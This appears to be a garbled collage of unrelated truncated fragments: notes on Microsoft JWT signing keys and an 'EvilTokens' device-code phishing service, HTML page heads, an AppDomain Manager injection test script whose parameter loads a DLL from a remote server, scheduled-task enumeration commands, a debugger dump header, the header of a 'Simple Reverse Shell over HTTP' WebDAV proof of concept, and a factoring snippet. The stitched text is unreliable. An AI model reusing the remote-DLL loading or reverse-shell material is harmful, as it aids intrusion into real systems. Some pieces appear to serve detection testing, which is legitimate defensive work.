Fetched live from https://login.microsoftonline.com/common/discovery/v2.0/keys on 2026-05-12.
All keys are RSA. The public exponent e is 65537 for every key. The kid (Key ID) in a JWT header identifies which key was used to sign the token. Microsoft rotates these keys periodically.
Short answer: A meaningful inflection point, but probably not a true watershed. EvilTokens consolidates several existing techniques into the first commodified, AI-end-to-end device code phishing service — significant, but the underlying attack and its mitigations are not new.
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>Lateral Movement Modeler</title> | |
| <script src="https://cdnjs.cloudflare.com/ajax/libs/d3/7.8.5/d3.min.js"></script> | |
| <style> | |
| @import url('https://fonts.googleapis.com/css2?family=Google+Sans:wght@400;500;700&family=Google+Sans+Mono&display=swap'); |
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>Physics Construct</title> | |
| <style> | |
| @import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&family=Orbitron:wght@400;700;900&display=swap'); | |
| :root { |
| # AppDomain Manager Injection Detection Tests | |
| # This script tests three methods of AppDomain Manager injection | |
| param( | |
| [string]$TestExecutable = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", | |
| [string]$RemoteServer = "http://yourserver.com/tasks.dll", | |
| [string]$Base64RemoteDll = "" | |
| ) | |
| $ErrorActionPreference = "Stop" |
Get-ScheduledTask | Where-Object {$_.Actions.Execute -like 'cmd.exe'} | Select-Object TaskName, TaskPath, State
Get-ScheduledTask | ForEach-Object {
$task = $_
$_.Actions | Where-Object {$_.Execute -like '*cmd.exe*'} | ForEach-Object {
[PSCustomObject]@{
TaskName = $task.TaskName
TaskPath = $task.TaskPath
State = $task.State
| Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 | |
| Copyright (c) Microsoft Corporation. All rights reserved. | |
| Loading Dump File [C:\dumps\regret.dmp] | |
| User Mini Dump File: Only registers, stack and portions of memory are available | |
| Symbol search path is: SRV*c:\symbols*http://msdl.microsoft.com/download/symbols | |
| Executable search path is: | |
| Windows XP Version 2600 (Service Pack 2) MP (2 procs) Free x86 compatible | |
| Product: WinNt, suite: SingleUserTS |
| <# | |
| Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1 | |
| #> | |
| <# | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback. | |
| Read And Write Files Over WebDAV Proof Of Concept |
| import math | |
| import time | |
| def gcd_factorial_efficient(n): | |
| """Compute GCD(sqrt(n)!, n) efficiently""" | |
| sqrt_n = int(math.sqrt(n)) | |
| g = n | |
| print(f"Computing GCD({sqrt_n}!, {n})") | |
| print(f"Processing {sqrt_n} numbers...\n") |